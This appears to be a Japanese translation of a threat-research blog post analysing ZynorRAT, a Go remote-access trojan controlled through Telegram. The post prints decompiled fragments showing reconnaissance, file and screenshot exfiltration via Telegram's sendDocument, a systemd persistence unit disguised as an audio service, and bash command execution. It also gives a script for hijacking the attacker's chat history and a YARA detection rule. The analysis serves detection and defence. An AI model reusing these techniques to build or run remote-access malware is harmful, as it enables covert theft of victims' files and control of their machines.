ZynorRAT 技術分析：新規のトルコ製 Go ベース RAT をリバースエンジニアリング

はじめに

最近の脅威ハンティング演習の中で、Sysdig Threat Research Team（TRT）は、私たちが ZynorRAT と名付けた新しいサンプルを特定しました。これは Go ベースのリモートアクセス型トロイの木馬（RAT）であり、Linux と Windows の両方に対して、カスタムのコマンド＆コントロール（C2）機能一式を提供します。

‍

ZynorRAT は 2025 年 7 月 8 日に初めて VirusTotal に提出され、既知の他のマルウェアファミリとの顕著な類似性はありません。VirusTotal への複数回のアップロードにおいて検出数が低下していることから、開発者が ZynorRAT マルウェアをより検知されにくくするために積極的に取り組んでいると私たちは確信しています。Telegram を用いてボットネットを制御することで管理が簡素化され、作者は行動を自動化できます。Telegram のチャット、ネットワークログ、リバースエンジニアリング中に発見された文字列、そして VirusTotal のテレメトリに基づき、TRT は ZynorRAT がトルコ起源であると高い確度で判断しています。

‍

マルウェアに関連する Telegram チャンネルを監視することで、私たちはマルウェアの開発状況を観測でき、作者の目的が完成後に販売することにあると推測しています。ZynorRAT をより深く理解するために、私たちはその機能を分析し、アトリビューション（帰属）を検討し、検知と侵害指標（IoC）を提示しました。以下で完全な技術分析をご覧ください。

Linux 向け ZynorRAT

ZynorRAT は Go で開発され、攻撃者に複数の機能を提供します。主な目的は、収集・持ち出し（エクスフィルトレーション）・リモートアクセスのツールとして機能することであり、Telegram ボットを通じて中央管理されます。Telegram は主要な C2 インフラとして機能し、マルウェアは被害者マシンに展開された後、そこから追加のコマンドを受け取ります。

‍

VirusTotal 上でこのマルウェアの複数のインスタンスを確認しました。最初は 2025 年 7 月 8 日に「zynor」という名前でアップロードされ、66 社中 22 社のセキュリティベンダーのみが悪性としてフラグを立てました。その後 2 日後の 7 月 10 日に再アップロードされ、悪性スコアはさらに低下し、66 社中 16 社のみが検出しました。これは、開発者が ZynorRAT をより検知されにくくするために改良していることを示している可能性が高いです。

‍

‍

os.hostname();
  os/user.Current();
  net/http.(*Client).Get((http.Client *)net/http.DefaultClient,"https://api.ipify.org",0x15);

os/exec.Command("ps",2,&local_18,1,1);
  os/exec.(*Cmd).CombinedOutput(this);
    fmt.Sprintf(&DAT_007cd3eb,0x21,&local_28,1,1);
    main.sendMessage(extraout_RAX_00,0x21);
...
  runtime.concatstring2(0,&DAT_007cb8dc,0x1e,extraout_RAX,2);
  main.sendMessage(extraout_RAX_01,&DAT_007cb8dc);

/* Name: main.sendDocument
   Start: 006bc8a0
   End: 006bd240 */
void main.sendDocument(undefined8 param_1,long param_2,undefined8 param_3,undefined8 param_4)

{
...
  os.OpenFile(param_1,local_e8,0,0);
/* D:/halil/lrat/main.go:391 */return;
  }
...
  mime/multipart.(*Writer).WriteField(this,"chat_id",7,extraout_RAX_05,2);
/* D:/halil/lrat/main.go:403 */  mime/multipart.(*Writer).WriteField
            (this,"caption",7,uStack0000000000000018,uStack0000000000000020);
  mime/multipart.(*Writer).CreateFormFile(this,"document",8,extraout_RAX_06,lVar1);
  puVar4 = go:itab.*os.File,io.Reader;
  io.copyBuffer(extraout_RAX_07,"document",go:itab.*os.File,io.Reader,extraout_RAX,0,0,0);

...
return;
}

github.com/kbinani/screenshot.NumActiveDisplays();
  github.com/kbinani/screenshot.GetDisplayBounds(lVar2);
  github.com/kbinani/screenshot.Capture(0,0,lVar3,lVar4);
  os.CreateTemp(0,0,&DAT_007c49ad,0x10);
  runtime.newobject(&datatype.Struct.png.Encoder);
  image/png.(*Encoder).Encode  (this,go:itab.*os.File,io.Writer,extraout_RAX_02,go:itab.*image.RGBA,image.Image,
             extraout_RAX_01);
    main.sendMessage(extraout_RAX_04,0x1f);
  os.(*file).close((os.file *)*extraout_RAX_02);
  main.sendDocument(*(undefined8 *)(*extraout_RAX_02 + 0x38),

[Unit]
Description=System Audio Core Service
After=network.target
[Service]
ExecStart=/home/user/.local/bin/audio
Restart=always
RestartSec=10
[Install]
WantedBy=default.target

systemctl --user daemon-reload

os/exec.Command("kill",4,&local_28,2,2);
    os/exec.(*Cmd).Run(this);
    main.sendMessage(extraout_RAX_00,0x22);

local_48 = "-c";
  os/exec.Command("bash",4,&local_48,2,2);
  os/exec.(*Cmd).CombinedOutput(this);

Windows 向け ZynorRAT

ZynorRAT の Windows 版も Go でコンパイルされており、Linux 版と同一です。同じ関数が存在し、Telegram ボット情報も含まれています。

‍

‍

このマルウェアのバージョンは Windows 向けに適応されていません。Windows 実行ファイルとしてコンパイルされているにもかかわらず、systemd コマンドや .config パスを用いた Linux 専用の永続化ロジックを実行します。
マルウェア開発者が VirusTotal の検出能力を確認しようとしており、ZynorRAT の Windows 版はまだ十分に開発されていないと考えるのが妥当です。

Telegram C2

私たちは Tosint を使用して Telegram ボット情報を抽出できました。

‍

Telegram 上でユーザー「lraterrorsbot」として活動する、「lrat」という専用ボットを発見しました。

‍

ZynorRAT ボットとのファイル通信は VirusTotal で追跡できます。

‍

逆コンパイルしたバイナリから chat_id の値を完全には取得できなかったため、以下の Python スクリプトを用いてボットに更新をポーリングしました。

import requests
import time

# === CONFIG ===
BOT_TOKEN = '<attacker_token>'API_URL = f'https://api.telegram.org/bot{BOT_TOKEN}/getUpdates'TIMEOUT = 60  # seconds
POLL_INTERVAL = 1  # delay

# === STATE ===
last_update_id = None
print("Starting Telegram long-polling...")

while True:
try:
        params = {
'timeout': TIMEOUT,
        }
if last_update_id is not None:
            params['offset'] = last_update_id + 1
        response = requests.get(API_URL, params=params, timeout=TIMEOUT + 5)
        result = response.json()
if result.get("ok") and result.get("result"):
for update in result["result"]:
                update_id = update["update_id"]
                print(f"[+] New update: {update}")
                last_update_id = update_id
else:
            time.sleep(POLL_INTERVAL)
    except Exception as e:
        print(f"[!] Error: {e}")
        time.sleep(5)

スクリプトを 10 日以上動かし続けたところ、ついに攻撃者のチャットから更新を受信し、その ID とボットに送られたテキスト「ip」と「id」が明らかになりました。

‍

チャット ID を取得できたため、次に簡単な Bash スクリプトを作成し、攻撃者とボットのチャットにおける過去メッセージをすべて、会話を記録するスクリプトへ転送できるようにしました。

bot_token="<attacker's bot token>" # Bot token
from_chat_id="<attacker's chat id>" # Attacker's chat ID
to_chat_id="<our chat id>" # Our chat ID with the bot
for message_id in $(seq 1 1000); do
  curl -s -X POST "https://api.telegram.org/bot${bot_token}/forwardMessage" \
    -H "Content-Type: application/json" \
    -d "{\"from_chat_id\":\"${from_chat_id}\",\"chat_id\":\"${to_chat_id}\",\"message_id\":${message_id}}"
done

攻撃者のチャットからは、侵害の十分な証拠、実行されたコマンド、そして前の例で示したように被害者ホストから取得された多数のスクリーンショットが明らかになりました。

‍

また、攻撃者が実行ファイルを配布するために、ファイル共有サービス Dosya.co を使用していることも判明しました。

‍

画像に示すとおり、執筆時点でも実行ファイル zynor は当該サイト上にホストされたままです。

‍

さらに、マルウェアが開発初期段階にあるようだということも確認しました。おそらく攻撃者自身のテストマシンからのスクリーンショットが多数あり、攻撃者が VSCode と go run コマンドを使って RAT をコンパイルして実行し、機能が実際に動作するかを確認するために /capture_display などのコマンドをさらに実行している様子が示されています。

‍

ボットは侵入先マシンに関する情報を報告しており、以下に示す例に基づいて、私たちは Telegram メッセージから次の IP アドレスを抽出できました。

‍

その相当数がクラウドプロバイダーに属していることから、攻撃者は 7 月 9 日頃に、実際には被害者マシンではないクラウドインスタンスへインストールしてマルウェアのテストを開始したと考えるのが妥当です。この場合、Amazon の IP の一部に対して逆引き IP ルックアップを試すと、EC2 インスタンスにマッピングされることが判明しました。

‍

また、トルコの IP アドレスの一部は攻撃者に属していると考えるのも妥当です。ただし、抽出した IP の一部が潜在的な被害者に属している可能性も否定できません。

アトリビューション（帰属）

分析の大半において、「halil」という名前が逆コンパイルしたバイナリ内に複数回登場し、その後、Telegram 経由で取得した攻撃者マシンのスクリーンショットにも現れました。攻撃者の名前またはニックネームが「halil」であり、この RAT は単独の個人による（開発中の）作品である可能性が高いと考えられます。開発初期段階にあるこのマルウェアは、地下市場で販売され始める可能性があると私たちは予測しています。

‍

これは珍しいことではなく、比較的スキルのある悪意あるアクターが、自ら悪性活動を行うのではなく、他者に販売することのみを目的としてマルウェアを開発するケースがあります。例えば、以下は 2025 年 1 月に地下フォーラムで販売され、ThreatMon が X で報告した類似マルウェア「SilentEye」のスクリーンショットです。

‍

‍

このマルウェアが地下フォーラムで積極的に販売されているという証拠は見つかっていません。攻撃者が開発初期段階にあると私たちは考えているため、ZynorRAT はまだ公にリリースされていない可能性が高いです。

検知

Sysdig Secure のお客様は、以下のルールにより ZynorRAT の脅威から保護されています。攻撃者が実行するコマンドに応じて、永続化コマンドなど追加の脅威検知もトリガーされます。

‍

• 偵察サービスに対する DNS ルックアップを検知（Sysdig Runtime Notable Events）

‍

• 疑わしいドメインに対する DNS ルックアップを検知（Sysdig Runtime Notable Events）

‍

‍

• MAL_ZYNOR Yara ルール（Malware Detection policy）

rule MAL_ZYNOR {
meta:
       md5 = "7422122eec7cfb3ec44737607d3ff5d2"       description = "Detects ZynorRAT"       author = "Sysdig TRT"       date = "2025-08-04"       tags = "zynor, ELF"       reference = "Internal Research"       version = "1.0"strings:
       $s1 = "main.handleShellCommand"       $s2 = "main.handlePersistence"       $s3 = "https://api.telegram.org/bot%s/sendMessage?chat_id=%d&text=%s" ascii
       $s4 = "https://api.telegram.org/bot%s/sendDocument" ascii
condition:
       uint32(0) == 0x464c457f and
1of ($s1, $s2) and
1of ($s3, $s4)
}

結論

マルウェアのエコシステムには RAT が不足しているわけではありませんが、それでもマルウェア開発者はゼロから RAT を作ることに時間を割き続けています。ZynorRAT は Go で開発された新規の悪性アクセス型トロイの木馬であり、統合された Telegram ボットから取得できた多数のテスト用スクリーンショットやコマンドが示すとおり、まだ開発初期段階にあります。ZynorRAT のカスタマイズ性と自動化された制御は、現代マルウェアの高度化が、初期段階においてさえ進んでいることを示しています。

‍

私たちは高い確度で、このツールが近いうちに地下市場（フォーラムまたは Telegram）に出回ると評価しています。そこでは悪性ソフトウェアの販売が一般的です。ZynorRAT は、ファイルの持ち出し、偵察と探索、永続化、被害者マシン上でのリモートコード実行など、複数の重要な機能を提供します。マルウェア作者は到達範囲を広げるために、Windows 版の開発を継続すると私たちは予測しています。

‍

ランタイム脅威検知は、これらの種類の脅威を検知するための多層防御戦略において引き続き重要です。Linux は脅威アクターからの標的となる傾向が強まっており、利用可能なツールの数も増え続けています。

付録